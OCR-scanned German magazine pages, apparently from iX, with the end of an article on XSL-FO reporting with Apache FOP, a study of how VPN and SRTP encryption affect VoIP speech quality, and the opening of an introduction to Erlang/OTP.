men (siehe „Onlinequellen“). 

Abbildung 2 zeigt eine Sicht, die 
die Autoren mit XSLT-Makros in kur- 
zer Zeit erstellt haben. Unter anderem 
entstand in der Vorbereitung zu die- 
sem Artikel eine Bibliothek mit kom- 
plexen mathematischen Funktionen 
und dynamischen SVG-Diagrammen. 
Leider werden solche Makros erst zur 
Laufzeit ausgeführt, sodass in der 
WYSIWYG-Ansicht lediglich Platz- 
halter zu sehen sind. 

Technisch gesehen läuft die Prozess- 
kette wie in Abbildung 3 dargestellt ab: 
Die Anwendung übergibt einen XML/ 
UTF-8-Strom mit den Rohdaten an 
einen beliebigen XSLT-Prozessor. Der 
Prozessor wandelt unter Nutzung der 
in XSL (XSLT und XSL-FO) definier- 
ten Vorlage und eventuell weiteren, von 
dieser referenzierten XSLT-Bibliothe- 
ken und statischen JPG- oder PNG-Bil- 
dern den Datenstrom in ein statisches 
XSL-FO-Dokument. Hierbei kann die 
Anwendung eingebettete SVG-Grafi- 
ken aus den Daten errechnen. 

Da das von den Autoren entwickelte 
Anwendungssystem in Java program- 
miert war, entfiel eine Recherche zu al- 
ternativen Prozessoren, da die Java 
Runtime Engine schon einen XSLT 1.0 
kompatiblen Prozessor mitbringt. Die 
Java-VM erlaubt es jedoch, den Pro- 
zessor auszutauschen, um beispielsweise 
einen besonders schnellen zu verwen- 
den. Dementsprechend hat der Anwen- 
der die freie Wahl aus einer großen 
Menge an Produkten. 

Per Pipe — ohne Zwischenspeiche- 
rung auf der Festplatte — reicht der De- 
signer das XSL-FO-Dokument sodann 
an einen nachgeschalteten Renderer 
weiter, der daraus das gewünschte 
Zielformat erstellt. Durch die offenen 
Schnittstellen ist es einfach, nicht nur 
den Vorlagen-Editor und den XSLT- 
Prozessor zu tauschen, sondern außer- 
dem den XSL-FO-Renderer. Je nach 
Aufgabe kann man in verschiedene 
Zielrichtungen optimieren (Ablaufge- 
schwindigkeit, Speicherverbrauch, zu- 
sätzliche Features oder Zielformat). 

Als erste Wahl für eine Rendering- 
Engine kam Apaches FOP ins Spiel, der 
Default-Renderer des Digiforms De- 
signer. Wie sich herausstellte, arbeitet 
FOP zwar bei Weitem nicht vollständig 
fehlerfrei und benötigt viel Arbeitsspei- 
cher, dennoch ist die Software schon in 
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vielen anderen Projekten erfolgreich im 
Einsatz und liefert mehr als akzeptable 
Ergebnisse. Da alle benötigten Funk- 
tionen erfüllt waren, erübrigte sich die 
Evaluierung weiterer Engines. 


Fazit 


Sieht man vom WYSIWYG-Designer 
ab, sind für ein professionelles Repor- 
ting keine proprietären Formate oder 
kommerziellen Werkzeuge notwendig. 
Es ist bedauerlich, dass es anschei- 
nend nur ein einziges Hilfsmittel auf 
dem Markt gibt, das seine Dateivorla- 
gen als standardkonforme XSL-Da- 
teien ablegt. Doch immerhin ist es re- 
lativ günstig und erfüllt alle gestellten 
Anforderungen. 

Entwicklungspotenzial gibt es in 
zwei Richtungen. Zum einen ist die 
FOP-Engine relativ langsam und ver- 
braucht viel Hauptspeicher. Je nach 
Druckvolumen könnte der Wechsel auf 
ein alternatives Produkt Vorteile mit 
sich bringen. Nach Beendigung der 
Arbeit an diesem Artikel erschien ein 
neues Release von FOP, die schneller 
arbeitet und weniger RAM benötigt. 

Wer komplexe Berichte benötigt, 
mit vielen Berechnungen und dynami- 
schen Elementen, könnte zum anderen 
XSL 2.0 sinnvoll finden, das das W3C 
nach Beendigung des Projekts zum 
Standard erhoben hat. Jedoch unter- 
stützen diese Version momentan nur 
die wenigsten Transformer/Renderer, 
was sich vermutlich jedoch bessern 
dürfte. 

Sollen ausschließlich allgemein ak- 
zeptierte Standards zum Einsatz kom- 
men, stellt die gefundene Kombination 
einen günstigen Umsetzungsweg dar. 
Es ist zwar noch Verbesserungspoten- 
zial vorhanden, jedoch ist mit FOP 1.0 
sowie XSL 2.0 Abhilfe in Sicht. (hb) 
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Voice over IP 


ft berücksichtigen Ent- 
scheider bei der Wahl 


von VolIP-Lösungen 
nur die potenzielle Kostener- 
sparnis sowie die flexible und 
einfache Handhabung, ver- 
nachlässigen aber einen ande- 
ren wesentlichen Aspekt: die 
Sicherheit. Die Autoren haben 
im Rahmen einer Forschungs- 
reihe am Institut für Internet- 
Sicherheit der FH Gelsenkir- 
chen untersucht, inwieweit 
unterschiedliche Ansätze hel- 
fen, Sicherheitslücken effek- 
tiv und einfach zu schließen, 
und wie stark sie die Benut- 
zung von VoIP beeinflussen. 
Voice over IP kapselt 
Sprachdaten in IP-Pakete und 
versendet sie über das Internet 
oder LAN. Üblicherweise 
kommt dabei das User Data- 
gram Protocol (UDP) zum 
Einsatz, das im Gegensatz zu 
TCP keine Liefergarantie gibt. 
Es eignet sich jedoch besser 
für Echtzeitkommunikation: 
Das Neuanfordern verlorener 
Pakete, wie es TCP durchführt, 
führt zu Verzögerungen, die 
die Sprachqualität verschlech- 
tern können. Allerdings ge- 
nügt UDP allein nicht für eine 
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isochrone Audio- oder Video- 
Übertragung. Dafür zeichnet 
das auf UDP aufsetzende Real- 
time Transport Protocol (RTP) 
verantwortlich. Das dazuge- 
hörige RTP Control Protocol 
(RTCP) misst während des Te- 
lefonats periodisch die Über- 
tragungsqualität des Trans- 
portnetzes. Beide sind in 
RFC 3550 spezifiziert (siehe 
Kasten „Onlinequellen“). 

Zur Anrufsteuerung ver- 
wendet man meist das Session 
Initiation Protocol (SIP, 
RFC 3261). Es signalisiert 
dem anderen Teilnehmer, dass 
ein Gespräch stattfinden soll, 
handelt die Kommunikations- 
parameter aus — etwa UDP- 
Ports und die zu verwendende 
Sprachkodierung — und been- 
det die Verbindung wieder, 
sobald ein Teilnehmer den 
Hörer auflegt. 


Wartezeiten 
unerwünscht 


Einfluss auf die Sprachqua- 
lität einer VoIP-Verbindung 
nimmt unter anderem der 
verwendete Codec. Er ver- 


VolP-Sicherheit versus 


Sprachqualität 


Sprach- 
barriere 


Peter Backs, Norbert Pohlmann, 
Claas Rettinghausen 


Kritik an Voice over IP bezieht sich 

meist auf zwei Aspekte: die mangelnde 
Sprachverständlichkeit und das Fehlen eines 
Abhörschutzes. iX geht der Frage nach, ob 
und wie sich beide Forderungen erfüllen 


lassen. 


wandelt das analoge Sprach- 
signal in ein digitales und 
umgekehrt. Steht nur eine ge- 
ringe Übertragungskapazität 
zur Verfügung — etwa im 
WAN -, kann er die Sprach- 
daten zusätzlich komprimie- 
ren. Wichtiger ist jedoch, 
dass sich das Signal mit mi- 
nimaler Verzögerung Kodie- 
ren und dekodieren lässt. Ta- 
belle 1 führt die bei der 
Untersuchung berücksichtig- 
ten Codecs auf. 

Auch die Eigenschaften 
des Netzes — gemeinhin unter 
dem Schlagwort „Quality of 
Service“ (QoS) zusammenge- 
fasst — beeinflussen die Qua- 
lität der Sprachübertragung. 
Für gute Verständlichkeit sind 
drei Kriterien zu erfüllen: 

- Die benötigte Übertragungs- 
kapazität muss während des 


Codec Delay (ms) 
6.711 u-Law 10 

6.711 Alaw 10 

6.726 1 

6.723. 30 

6.7290 10 

6SM 20 


gesamten Gesprächs zur Ver- 
fügung stehen. 
— Paketverluste (Packet Loss) 
müssen verhindert oder durch 
den Codec ausgeglichen wer- 
den. 
— Pakete müssen rechtzeitig 
und regelmäßig beim Empfän- 
ger eintreffen (Delay, Jitter). 
Je nach Entfernung der 
Endgeräte und Anzahl der 
Router auf dem Übertragungs- 
weg kann die Verzögerung 
(Delay) stark schwanken. Die 
Signallaufzeit (Propagation 
Delay) — die Zeit, die ein Sig- 
nal dafür benötigt, eine Leitung 
zu durchqueren - ist proportio- 
nal zur Entfernung, genauer 
gesagt zur Leitungslänge. Hin- 
zu kommt die Vermittlungs- 
verzögerung (Switching De- 
lay). Netzkoppelelemente wie 
Router oder Switches müssen 


Bitrate (kBit/s) MOS 
64 4,1-4,5 
64 4,1-4,5 
32 3,85-4,2 
6,3 3 
8 3,9 
182 35 
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in der Regel warten, bis alle 
Bits eines Pakets eingetroffen 
sind. Anschließend wählen 
sie eine Route zum Empfän- 
ger und serialisieren die Bits 
wieder (Store-and-Forward). 
Die Warteschlangen eines 
Routers verzögern die Verar- 
beitung zusätzlich (Queueing 
Delay). Muss ein Rechner 
aufgrund des Zugriffsverfah- 
rens des Netzes -— etwa 
CSMA/CD bei Ethernet -— 
warten, bis er Daten senden 
darf, spricht man von Zu- 
griffsverzögerung (Access 
Delay). Sie ist jedoch in der 
Regel vernachlässigbar. 

Der maximale Durchsatz 
ergibt sich aus der verwende- 
ten Hardware, wobei das 
schwächste Glied die Kapa- 
zität einer Übertragungsstre- 
cke bestimmt. Theoretisch 
sind Verzögerung und Durch- 
satz voneinander unabhängig. 
Messungen zeigen jedoch, 
dass mit steigendem Ver- 
kehrsaufkommen auch die 
Verzögerung steigt. 

Jitter steht bei VoIP für 
Schwankungen der Verzöge- 
rungszeit (Delay Jitter), die 
ihrerseits die Sprachqualität 
herabsetzen. Üblicherweise 
enthalten VoIP-Endgeräte des- 
halb einen Jitter-Puffer, der 
die Unregelmäßigkeiten aus- 
gleicht. Er erhöht jedoch 
wiederum die Gesamtverzö- 
gerung (siehe Abbildung 1). 


Das Ohr 
als Messgerät 


Leider liefern die Zahlen kei- 
ne direkte Aussage, ob ein 
VoIP-Gespräch verständlich 
ist oder nicht. Darum wurden 


IP-Netz 


Verzögerung 


Bez Last 


Übermittlung 


oz 
Tee: End-to-End Delay 


Lange Reise: Netze, VPN-Router und Endgeräte tragen zur Verzögerung des Sprachsignals 


bei (Abb. 1). 


Verfahren entwickelt, die die 
Verbindungsqualität durch ei- 
ne einzige Zahl bewerten: 

— Mean Opinion Score (MOS) 
ist der am häufigsten zu fin- 
dende Wert zur Qualitätsbe- 
schreibung. Man ermittelt ihn, 
indem man eine repräsentati- 
ve Auswahl von Testperso- 
nen Sprachproben auf einer 
Skala von 1 bis 5 bewerten 
lässt (siehe Tabelle 2). Dabei 
steht der Wert 5 für optimale 
Sprachqualität; ISDN-Verbin- 
dungen erreichen einen MOS 
von etwa 4,5, analoge Fest- 
netzverbindungen ungefähr 
3,5. Andere Verfahren, die 
ohne die subjektive Bewer- 
tung durch Testpersonen aus- 
kommen, können den MOS 
rechnerisch herleiten. 

— Sprachmusterorientierte Ver- 
fahren senden ein definiertes 
Sprachmuster über ein Netz 
und vergleichen das an der 
Gegenstelle eintreffende Sig- 
nal mit dem ursprünglichen. 
Das für VoIP wichtigste Ver- 
fahren Perceptual Evaluation 
of Speech Quality (PESQ) 
hat die ITU-T in der Empfeh- 
lung P.862 ratifiziert. Der 
Vorgänger PSQM (Perceptual 
Speech Quality Measurement) 


wie die Verzögerung aus. 


A-TRACT 


@ VolP-Verbindungen lassen sich mit protokollspezifischen 
oder allgemeinen Verfahren sichern. 


© Beide Ansätze erhöhen die zu übertragende Datenmenge, 
wirken sich jedoch nur unwesentlich auf QoS-Parameter 


© In langsamen Netzen empfiehlt es sich, VolP-spezifische 
Sicherheitsmaßnahmen wie Secure RIP (SRTP) einzusetzen, 
da sie weniger Overhead erzeugen. 
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berücksichtigte nur den Ein- 
fluss des Codecs auf die 
Sprachqualität, PESQ lässt 
darüber hinaus die QoS-Para- 
meter in die Bewertung ein- 
fließen. Es funktioniert aller- 
dings bei „schlechten“ Netzen 
mit hohem Delay oder Packet 
Loss nicht zuverlässig. Als 
Ergebnis liefert PESQ unter 
anderem den hergeleiteten 
MOS. 

— Netzbasierte Verfahren be- 
werten die Verbindungsqua- 
lität passiv, ohne das Einspie- 
len spezieller Sprachmuster. 
Das häufig verwendete E-Mo- 
dell produziert anhand der 
gemessenen und erwarteten 
QoS-Parameter sowie des ver- 
wendeten Sprachcodecs den 
sogenannten R-Faktor, der 
die Qualität der Sprachüber- 
tragung angibt. Er liegt zwi- 
schen O und 100, wobei 100 
optimale Sprachqualität be- 
deutet; 94 entspricht ISDN- 
Qualität. Der R-Faktor lässt 
sich ebenfalls in den entspre- 
chenden MOS umrechnen. 


Nicht für 


aller Ohren 


Telefonie ist vor E-Mail und 
Post nach wie vor das 
wichtigste Kommunikations- 
medium der heutigen Gesell- 


schaft. Geradezu selbstver- 
ständlich verlassen sich Nut- 
zer von analogen oder ISDN- 
Telefonen auf die Sicherheit 
der Telefonnetze, deren Schutz 
ausschließlich von den Be- 
schränkungen des physischen 
Zugangs zur Telefonleitung 
abhängt. 

Bei VoIP muss der An- 
greifer ebenfalls Zugang zu 
den Systemen oder Übertra- 
gungsmedien haben, die die 
VoIP-Telefonate übermitteln. 
Durch einfache Spoofing- 
Angriffe und die für den Be- 
nutzer nicht vorhersehbaren 
Routingwege der IP-Pakete 
erhöht sich die Zahl der po- 
tenziellen Angreifer im Ver- 
gleich zur herkömmlichen 
Telefonie jedoch erheblich. 
Zudem ist ungesichertes VoIP 
mit einem normalen PC und 
frei erhältlicher Software kom- 
promittierbar, während man 
für das Abhören von ISDN- 
Gesprächen zumindest spe- 
zielle — obgleich nicht kom- 
plizierte — Hardware benötigt. 
Wer die Sicherheit eines VoIP- 
Gesprächs gewährleisten will, 
muss daher zusätzliche Maß- 
nahmen ergreifen. 

Sicherungsmechanismen 
können sowohl VoIP-spezi- 
fisch als auch allgemeiner 
Natur sein. Zu Letzteren zäh- 
len Virtual Private Networks 


MOS Rating Bedeutung 

5 excellent keinerlei Anstrengung zum Verständnis der Sprache notwendig; 
totale Entspannung möglich 

4 good keine Anstrengung, aber Aufmerksamkeit notwendig 

3 fair leichte, moderate Anstrengung nötig 

2 poor merkbare, deutliche Anstrengung nötig 

j bad keine Verständigung möglich 
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Voice over IP 


(VPN). Sie können den ge- 
samten Verkehr zwischen 
zwei oder mehreren Netzen 
absichern. 

Da der Verschlüsselungs- 
kanal (Security Association, 
kurz SA) bei einem VPN 
meist permanent besteht, muss 
man die verwendeten Schlüs- 
sel regelmäßig ändern. Das 
sogenannte Re-Keying kann 
während eines Gesprächs Ein- 
fluss auf die Qualität der 
Verbindung und damit auf 
die VoIP-Sprachqualität ha- 
ben, wenn der Aufbau einer 
neuen SA erst mit dem Ab- 
laufen der alten stattfindet. 
Daher sollte die VPN-Lösung 
in der Lage sein, neue SAs 
rechtzeitig vor dem Ablaufen 
der momentan verwendeten 
zu erzeugen. 


Keine Infrastruktur 
für Public Keys 


Darüber hinaus hat eine gene- 
rische Lösung wie ein VPN 
den Nachteil, dass die Siche- 
rung erst an der Grenze des 
lokalen Netzes beginnt bezie- 
hungsweise endet. Das LAN 
transportiert alle Sprachdaten 
unverschlüsselt, ein Angreifer 
kann sie daher leicht lesen. 
Außerdem sind organisations- 
übergreifende VPNs — etwa 
eine Kopplung unterschied- 
licher Firmennetze — nur mit 


erheblichem Aufwand reali- 
sierbar, weshalb eine flächen- 
deckende VoIP-Absicherung 
oft scheitert. In erster Linie 
eignet sich der VPN-Ansatz 
daher für den internen VoIP- 
Verkehr einer Organisation. 

VoIP-spezifische Sicher- 
heitsmaßnahmen erweitern 
die existierenden VoIP-Proto- 
kolle. Üblicherweise überträgt 
man SIP-Daten per SSL/TLS 
gesichert (SIPS) von einem 
Hop zum nächsten und ver- 
wendet Secure RTP (SRTP, 
RFC 3711) zur Verschlüsse- 
lung des Medienstroms zwi- 
schen den Teilnehmern (End- 
to-end). 

Von entscheidender Be- 
deutung ist dabei die Ver- 
trauenskette zwischen den an 
der Signalisierung beteiligten 
Intermediären, etwa den SIP- 
Gateways der jeweiligen Pro- 
vider. Die Teilnehmer tauschen 
die für SRTP verwendeten 
Schlüssel im Klartext innerhalb 
der SIP-Signalisierungsnach- 
richten aus. Dadurch kommen 
die Intermediäre in den Besitz 
der Schlüssel, und es besteht 
die Gefahr eines Man-in-the- 
middle-Angriffs (MITM At- 
tack). 

Des Weiteren ist eine or- 
ganisationsübergreifende Pub- 
lic-Key-Infrastruktur (PKD) 
oder eine andere Infrastruktur 
für kryptografische Schlüssel 
Voraussetzung, um Kommu- 


Institut für Internet-Sicherheit 
der FH Gelsenkirchen 


RFC 3550 - RTP: 
A Transport Protocol for 
Real-Time Applications 


REGBPSlESSIR: 
Session Initiation Protocol 


RFC 3711 - The Secure 
Real-time Transport 
Protocol [SRTP) 


ZRTP: Media Path Key 
Agreement for Secure RIP 


OpenSWAN 
OpenVPN 
QoSSIP-Projekt 
ITD VoIP Test Suite 


www.internet-sicherheit.de 


tools.ietf.org/html/rfc3550 


tools.ietf.org/html/rfc3261 


tools.ietf.org/html/rfc37 11 


zfoneproject.com/docs/ietf/ 
draft-zimmermann-avt-zrtp-06x.html 


www.openswan.org 
openvpn.net 
www.gossip.de/index.php?catid=25 
www.trafficlyser.de/hp/itd/front_ 
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Hard 


Messaufbau zur Untersuchung des Einflusses von VPN- 
Tunneln auf die Quality of Service (@o$) (Abb. 2). 


nikationspartner zu authen- 
tifizieren. Angesichts der 
Tatsache, dass sich eine weit- 
flächige PKI etwa für den 
E-Mail-Dienst bislang nicht 
durchsetzten konnte, bleibt 
jedoch zweifelhaft, ob sich 
verbreitetes sicheres Telefo- 
nieren mit den etablierten 
VoIP-Standards durchsetzen 
wird. 

Um den organisatorischen 
Aufwand zu umgehen, hat 
PGP-Erfinder Philip R. Zim- 
mermann ein Protokoll ent- 
wickelt, das ohne PKI aus- 
kommt: ZRTP führt eine 
ungesicherte Diffie-Hellman- 
Schlüsselaushandlung durch 
und baut anhand der daraus 
abgeleiteten Schlüssel einen 
gesicherten SRTP-Kanal auf. 
Um die konzeptionell beding- 
te Anfälligkeit des Verfah- 
rens gegen Man-in-the-midd- 
le-Angriffe zu kompensieren, 
stellt ZRTP einen Hash-Wert 
der öffentlichen Diffie-Hell- 
man-Keys bereit, den die Ge- 
sprächspartner mündlich („In- 
band“) vergleichen und sich 
dadurch authentifizieren kön- 
nen. Nachteilig bei dem Ver- 
fahren ist, dass die Authenti- 
fizierung durch den Menschen 
erfolgt, was naturgemäß nie 
völlig sicher ist. Außerdem 
lassen sich fremde Stimmen 
- im Geschäftsumfeld die 
Regel - prinzipiell nicht au- 
thentifizieren. 


Sicher und trotzdem 
verständlich 


Den Einfluss der Sicherungs- 
maßnahmen auf die Sprach- 


qualität haben die Autoren 
im Labor untersucht. Alle 
Messungen fanden in einem 
isolierten LAN statt, um Stör- 
quellen im Netzwerk auszu- 
schließen und unverfälschte 
Messergebnisse zu garantieren. 
Der Testaufbau bestand aus 
drei unterschiedlichen Subnet- 
zen: den Sender- und Emp- 
fänger-Netzen 192.168.1.0 
und /92.168.2.0 sowie dem 
Transportnetz 192.168.3.0. Die 
Subnetze mit den VoIP-Kom- 
ponenten sind durch Security 
Gateways gekoppelt (siehe 
Abbildung 3). 

Als VPN-Gateways kamen 
die frei verfügbare IPsec-Im- 
plementierung OpenSWAN 
und das ebenfalls freie 
OpenVPN (SSL/TLS) zum 
Einsatz. Ein Netz mit gewöhn- 
lichen Routern anstelle der 
VPN-Gateways diente als Re- 
ferenz. Die Messungen wur- 
den mit einer Beta-Version 
des Q0S-Messsystems Net- 
Gage, entwickelt vom Projekt 
QoSSIP der FH Köln, und der 
VoIP Test Suite von ITD In- 
formationstechnologie durch- 
geführt. Die Bridge-Software 
NetGen — ebenfalls eine Ent- 
wicklung des QoSSIP-Pro- 
jekts — simulierte zwischen 
den Gateways ein reales Netz 
mit einstellbarem Delay, Jit- 
ter und Packet Loss. Mit dem 
Netzbenchmark Iperf erhöh- 
ten die Tester schrittweise 
die Last im Netz. 

Sowohl mit NetGage als 
auch mit der VoIP Test Suite 
ließ sich der Einfluss der 
VPN-Tunnel auf Jitter und 
Packet Loss messen und er- 
gaben eine zusätzliche Ver- 
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zögerung von ein bis zwei 
Millisekunden, die für die 
Sprachverständlichkeit nahe- 
zu unerheblich ist. 

Beide VPN-Gateway-Im- 
plementierungen können die 
übertragenen Daten zusätz- 
lich komprimieren. Verwen- 
det man den PCM-Codec 
G.711, gleicht die Kompres- 
sion den durch die Gateways 
entstehenden Overhead aus. 
Kommt ein komprimierender 
Codec zum Einsatz, bleibt die 
zusätzliche Kompression im 
Gateway ohne Wirkung. In 
beiden Fällen erhöht sich die 
Verzögerung um weniger als 
eine Millisekunde. Da die 
Gateways bei aktivierter Kom- 
pression mehr Arbeit leisten 
müssen, ist allerdings zu er- 
warten, dass der Gesamtdurch- 
satz sinkt. 

Beim VoIP-spezifischen 
Ansatz ließen sich mit der 
eingesetzten Software keine 
detaillierten Messungen durch- 
führen — sie beherrscht die 
verwendeten Sicherungspro- 
tokolle noch nicht. Allein den 
Datendurchsatz beziehungs- 
weise die Bitrate kann man 
zuverlässig messen. Daraus 
ergibt sich ein Overhead von 
rund rund 10 %, bei Verwen- 
dung von SRTP sowie den 
Codecs G.723.1 und G.729a. 
Die VPN-Gateways verursa- 
chen in derselben Situation 
mit oder ohne Kompression 
einen Overhead zwischen 
75 und 90 % relativ zu einer 
ungesicherten Verbindung. 
Allerdings können mehrere 
Parameter die Messungen be- 
einflussen: 

— Paketierung der Sprachseg- 
mente: Überträgt man mehre- 
re Sprachsegmente pro IP- 
Paket, verringert sich der 
Protokoll-Overhead. Die Ver- 
zögerung nimmt jedoch zu. 

— Codec-Bitrate: Die Codecs 
unterscheiden sich hinsichtlich 
der benötigten Übertragungs- 
kapazität und der Sprachqua- 
lität voneinander. 

— Codec-Segmentgröße: Ab- 
hängig von der Segmentgröße 
übertragen Codecs mehr oder 
weniger Pakete auf einmal, 
was den Protokoll-Overhead 
beeinflusst. 
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— Blockgröße der verwende- 
ten Verschlüsselung: Die ver- 
wendeten Algorithmen ver- 
schlüsseln Daten blockweise. 
Stehen nicht genug Daten 
zur Verfügung, müssen sie 
Null-Bytes als „Füller“ ein- 
fügen. 


Fazit 


Die untersuchten Sicherheits- 
maßnahmen wirken sich vor- 
rangig auf die benötigte Über- 
tragungskapazität aus, nicht 
jedoch auf Delay, Jitter oder 
Packet Loss. Abhängig von 
den Einstellungen der VoIP- 
Software und der Security- 
Gateways kann sich die Grö- 
ße der VoIP-Pakete mehr als 
verdoppeln. Anwendern mit 
langsamer Internetanbindung 
sowie Unternehmen mit vie- 
len VoIP-Nutzern kann dies 
erhebliche Schwierigkeiten be- 
reiten. Durch geeignete Ein- 
stellungen der VoIP- und Ver- 
schlüsselungssoftware lässt 
sich jedoch die Bitrate beein- 
flussen. Ist die zur Verfügung 
stehende Übertragungskapa- 
zität gering, sollte man je- 
doch das VoIP-spezifische 
SRTP einem VPN-Tunnel 
vorziehen. (mr) 
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Programmiersprachen 


Parallele Anwendungen 
entwickeln mit Erlang/OTP 


Neben- un 
Miteinander 


Frank Müller 


Nicht viele funktionale Programmiersprachen 
haben den Weg aus der akademischen Nische 
heraus geschafft. Erlang ist eine davon. Ein 
kompakter Code, in dem Nebenläufigkeit und 
Verteilung eine entscheidende Rolle spielen, 
prädestinieren die Sprache für skalierbare und 
hochverfügbare Anwendungen. 
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ahrelang steigerte sich die 
J Performanz von Rechner- 
systemen durch die Er- 
höhung des Prozessortakts. 
Dieser Weg hat jedoch seine 
Grenzen, beispielsweise wegen 
thermischer Schwierigkeiten. 
Eine Alternative ist die paral- 
lele Verarbeitung mit multi- 
plen Ablaufpfaden auf der 
CPU durch mehrfache Prozes- 
sorkerne oder Multiprozes- 
sorsysteme. So sind Notebooks 
heute mit Dual-Core-Prozes- 
soren ausgestattet, Hochleis- 
tungs-PCs mit bis zu acht 
Kernen und Server mit einer 
großen Anzahl von CPUs. 
Allerdings ist es nicht eben 
trivial, Aufgabenstellungen 
zu parallelisieren geschweige 
denn, dies in Code zu gießen. 
Eine Plattform, die dem Ent- 
wickler bei verteilten und pa- 
rallelen Anwendungen entge- 
genkommt, ist Erlang/OTP. 
Immer mehr Programmie- 
rer sehen sich vor die Aufga- 
be gestellt, solche Systeme zu 
entwickeln, sodass der Name 
Erlang in letzter Zeit mehr und 
mehr auftaucht. Die Geschich- 
te der Sprache sowie der dazu- 
gehörigen Plattform beginnt 
jedoch schon viel früher. Der 
Grundstein wurde bereits 1984 
gelegt, als Joe Armstrong, Gö- 
ran Bäge, Seved Torstendahl 
und Mike Williams das Com- 
puter Science Laboratory 
(CSLab) des Telekommuni- 
kationsunternehmens Ericsson 
gründeten. Eine der Aufga- 
ben dieses Teams war die 
Entwicklung einer Software- 
infrastruktur für Telekommu- 
nikationssysteme. Hierzu ex- 
perimentierten die Forscher 
mit verschiedenen Formen 
imperativer, deklarativer, re- 
gelbasierter und objektorien- 
tierter Sprachen und prüften 
sie auf ihre Eignung für das 
Einsatzgebiet der Telefonie. 
Anforderungen an die Pro- 
grammiertechnik waren eine 
massiv-parallele Verarbeitung 
sowie die Möglichkeit, asyn- 
chrone Nachrichten zwischen 
den Prozessen zu senden. 
Weiterhin sollten Updates zur 
Laufzeit einen unterbrechungs- 
freien Betrieb gewährleisten. 
Ein weiterer Anspruch war, 


Programme mit wenig und 
elegantem Code realisieren zu 
können, der sich dicht an der 
formalen Spezifikation orien- 
tiert. Die Motivation hierfür 
lag in der Erkenntnis, dass die 
Anzahl fehlerfrei entwickelter 
Code-Zeilen pro Tag unabhän- 
gig von der gewählten Pro- 
grammiersprache ist. Somit 
sollte wenig Code pro Funk- 
tion zu einer geringen Fehler- 
trächtigkeit führen. 

Einige dieser Eigenschaf- 
ten waren zu dieser Zeit mit 
Prolog möglich, sodass Er- 
lang zunächst auf dieser de- 
klarativen Sprache basierte, 
ergänzt durch Nebenläufig- 
keit. Allerdings erwies sich 
im Laufe der Entwicklung das 
Backtracking von Prolog als 
ungeeignet, und die Weichen 
wurden in Richtung funktiona- 
ler Programmierung gestellt. 
Um einen geeigneten Namen 
für die neue Sprache zu fin- 
den, griff das Entwicklerteam 
auf die Tradition zurück, Pro- 
grammiersprachen nach Ma- 
thematikern zu benennen. 
Nach Pascal, Euclid und Oc- 
cam fiel die Wahl auf A.K. 
Erlang, dessen Formel für 
Warteschlangenprobleme in 
der Telefonie zudem einen 
Bezug zu Herstellern von 
Telekommunikationstechnik 
herstellt. Damit steht der Na- 
me Erlang entgegen der viel- 
fach vertretenen Meinung 
nicht für den Begriff Erics- 
son Language. 


Parallel und 
unterbrechungsfrei 


Die während der Entwicklung 
von Erlang getroffenen De- 
sign-Entscheidungen finden 
sich teils in weiteren zu die- 
sem Zeitpunkt bereits bekann- 
ten Sprachen wieder, sind teils 
jedoch auch einmalig. Letzt- 
endlich repräsentiert Erlang 
einen individuellen Mix für 
die spezifischen Anforderun- 
gen und ist daher eher prag- 
matisch denn an einer reinen 
Lehre orientiert. 

Eine ihrer signifikanten Ei- 
genschaften ist die Nutzung 
einer virtuellen Maschine für 
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Portabilität unabhängig vom 
Betriebssystem. Ericsson bietet 
Erlang heute für Solaris, Linux, 
Windows und VxWorks an, in 
der Open-Source-Version zu- 
sätzlich für Mac OS X und im 
Quelltext. Nebenläufigkeit so- 
wie Speicherverwaltung inklu- 
sive der Garbage Collection 
sind Aufgabe der VM. 


VM sorgt für Platt- 
formunabhängigkeit 


Erlang ist dynamisch typisiert 
und kennt neben Integer- und 
Fließkommazahlen, Atomen 
und Bit-Strings noch Referen- 
zen, Prozess- und Portidentifi- 
katoren sowie Funktionsobjek- 
te. Referenzen sind in einer 
Laufzeitumgebung immer ein- 
deutig, Ports dienen der Kom- 
munikation mit der Außenwelt. 
Als komplexere Datentypen 
gibt es Tupel, Listen und 
Strukturen. Letztere bildet Er- 
lang intern jedoch transparent 
auf Tupel ab. Strings und 
Booleans sind keine eigenen 
Datentypen, sondern werden 
durch Listen von Integerwerten 
beziehungsweise die Atome 
true und false repräsentiert. 
Ein wichtiges Sprachmittel 
ist die Endrekursion von 
Funktionen. Sie erlaubt die 
Implementierung aller Schlei- 
fen — auch der unendlichen — 
als rekursive Funktionen, ohne 
dass es zu Speicherüberläufen 
kommt. Auf dieser Basis sind 
auch die langlaufenden Pro- 
zesse möglich, die keinen li- 
nearen Durchlauf darstellen. 


In ihnen wird die Prozess- 
funktion immer wieder endre- 
kursiv aufgerufen. Mit dem 
receive-Konstrukt greift sie 
auf die asynchrone Nachrich- 
tenschlange des Prozesses zu 
und verarbeitet die Nachricht. 

Für den Empfang der Nach- 
richten kommt das in Erlang 
überall gegenwärtige Pattern 
Matching zum Einsatz. Es er- 
laubt die einfache Analyse 
von Termen für die Zuweisung 
von Werten zu Variablen. 
Die letzte wichtige Eigen- 
schaft ist die standardisierte 
Fehlerbehandlung, die einen 
aggressiven Programmierstil 
unterstützt. 

Mit der Implementierung 
dieser Plattform fiel Ende 
1987 die Wahl auf Erlang als 
Software-Basis für eine Tele- 
fonanlage. Der Prototyp die- 
ser Anlage wurde 1989 fertig- 
gestellt und erfüllte die in ihn 
gestellten Erwartungen voll. 
Im Rahmen einer Evaluierung 
im Projekt ACS/Dunder ha- 
ben die Entwickler die Effi- 
zienzverbesserung im Design 
gegenüber der zu der Zeit üb- 
lichen Sprache PLEX mit ei- 
nem Faktor zwischen 9 und 
22 bewertet. War die erste 
Implementierung noch ein 
Interpreter auf der Basis von 
Prolog, folgten später ein 
Compiler sowie eine abstrakte 
Maschine für die Ausführung. 
Bis 1992 erreichte Erlang den 
Status der Produktionsreife 
und konnte für hardwarenahe 
Anwendungen mit nahezu 
Echtzeitanforderungen einge- 
setzt werden. 


entwickeln müssen. 


Systeme erheblich. 


A-TRACT 


@ Bereits vor über zwanzig Jahren entstanden, rückt Erlang/ 
OTP zunehmend in das Blickfeld von Programmierern, 
die massiv-parallel arbeitende, verteilte Anwendungen 


© Erlang ist eine funktionale Programmiersprache, kann 
jedoch ihre in Prolog liegenden Wurzeln nicht verleugnen, 
sodass die Syntax für Einsteiger gewöhnungsbedürftig ist. 


© Dennoch erleichtert Erlang durch seine Spracheigenschaften 
sowie die durch die virtuelle Maschine gegebenen Platt- 
formunabhängigkeit und nicht zuletzt durch die umfangreiche 
OTP-Bibliothek die Entwicklung verteilter, performanter 
